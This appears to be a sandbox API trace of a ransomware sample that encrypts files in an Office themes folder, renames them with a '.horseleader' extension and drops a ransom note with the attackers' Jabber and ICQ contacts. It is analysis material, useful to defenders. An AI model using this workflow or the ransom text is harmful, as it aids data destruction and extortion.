[0246.112] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.112] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe32f2700, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe32f2700, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x10db7, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="BLENDS.ELM", cAlternateFileName="")) returned 1 [0246.112] lstrcmpiW (lpString1="BLENDS.ELM", lpString2="Windows") returned -1 [0246.112] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM") returned 77 [0246.112] StrStrIW (lpFirst="BLENDS.ELM", lpSrch=".horseleader") returned 0x0 [0246.112] lstrcmpW (lpString1="BLENDS.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.113] lstrcmpW (lpString1="BLENDS.ELM", lpString2="_uninstalling_.png") returned 1 [0246.113] lstrlenW (lpString=".testttjffg") returned 11 [0246.113] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM", lpSrch=".testttjffg") returned 0x0 [0246.113] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.113] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.113] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\blends.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x1a4 [0246.113] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM") returned 77 [0246.113] StrStrW (lpFirst="BLENDS.ELM", lpSrch=".txt") returned 0x0 [0246.113] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=69047) returned 1 [0246.114] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.114] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.117] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.117] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.117] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x5edb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.117] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.119] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.119] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.119] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xbdb7, 
lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.119] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.120] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.120] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.120] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.120] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.120] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.121] CloseHandle (hObject=0x1a4) returned 1 [0246.121] GetProcessHeap () returned 0x780000 [0246.121] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.121] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM.horseleader") returned 89 [0246.121] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\blends.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\blends.elm.horseleader")) returned 1 [0246.122] GetProcessHeap () returned 0x780000 [0246.122] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.122] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb59ad00, ftCreationTime.dwHighDateTime=0x1c4d794, ftLastAccessTime.dwLowDateTime=0x5f729350, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcb59ad00, ftLastWriteTime.dwHighDateTime=0x1c4d794, nFileSizeHigh=0x0, nFileSizeLow=0x216, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="BLENDS.INF", cAlternateFileName="")) returned 1 [0246.122] lstrcmpiW (lpString1="BLENDS.INF", lpString2="Windows") returned -1 [0246.122] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.INF") returned 77 [0246.122] StrStrIW (lpFirst="BLENDS.INF", lpSrch=".horseleader") returned 0x0 [0246.122] lstrcmpW (lpString1="BLENDS.INF", lpString2="#Decrypt#.txt") returned 1 [0246.122] lstrcmpW (lpString1="BLENDS.INF", lpString2="_uninstalling_.png") returned 1 [0246.122] lstrlenW (lpString=".testttjffg") returned 11 [0246.122] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.INF", lpSrch=".testttjffg") returned 0x0 [0246.122] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.122] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.122] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\blends.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.125] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.INF") returned 77 [0246.125] StrStrW (lpFirst="BLENDS.INF", lpSrch=".txt") returned 0x0 [0246.125] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=534) returned 1 [0246.125] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x216, lpOverlapped=0x0) returned 1 [0246.127] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdea, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.127] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x216, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x216, lpOverlapped=0x0) returned 1 [0246.127] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.127] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.127] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.127] CloseHandle (hObject=0x1a4) returned 1 [0246.128] GetProcessHeap () returned 0x780000 [0246.128] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.128] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.INF.horseleader") returned 89 [0246.128] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\blends.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\blends.inf.horseleader")) returned 1 [0246.132] GetProcessHeap () returned 0x780000 [0246.132] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.132] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6d2cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x885, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.132] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.132] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 78 [0246.133] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.133] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.133] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.133] lstrlenW (lpString=".testttjffg") returned 11 
[0246.133] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.133] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.133] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.133] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.135] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 78 [0246.135] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.135] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2181) returned 1 [0246.135] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x885, lpOverlapped=0x0) returned 1 [0246.137] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff77b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.137] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x885, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x885, lpOverlapped=0x0) returned 1 [0246.137] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.137] WriteFile (in: hFile=0x1a4, 
lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.138] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.138] CloseHandle (hObject=0x1a4) returned 1 [0246.138] GetProcessHeap () returned 0x780000 [0246.138] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.138] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF.horseleader") returned 90 [0246.138] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif.horseleader")) returned 1 [0246.139] GetProcessHeap () returned 0x780000 [0246.139] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.139] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x5093, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.139] lstrcmpiW 
(lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.139] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 79 [0246.139] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.139] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.139] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.140] lstrlenW (lpString=".testttjffg") returned 11 [0246.140] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.140] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.140] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.140] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.141] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 79 [0246.141] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.141] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=20627) returned 1 [0246.141] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.144] 
SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.144] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.145] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x93, lpOverlapped=0x0) returned 1 [0246.145] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffff6d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.145] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x93, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x93, lpOverlapped=0x0) returned 1 [0246.145] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.145] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.146] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.146] CloseHandle (hObject=0x1a4) returned 1 [0246.146] GetProcessHeap () returned 0x780000 [0246.146] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.146] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG.horseleader") returned 91 [0246.146] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png.horseleader")) returned 1 [0246.147] GetProcessHeap () returned 0x780000 [0246.147] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.147] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x5093, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.148] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.148] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\#Decrypt#.txt") returned 80 [0246.148] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.148] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us 
via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0246.148] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.150] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9C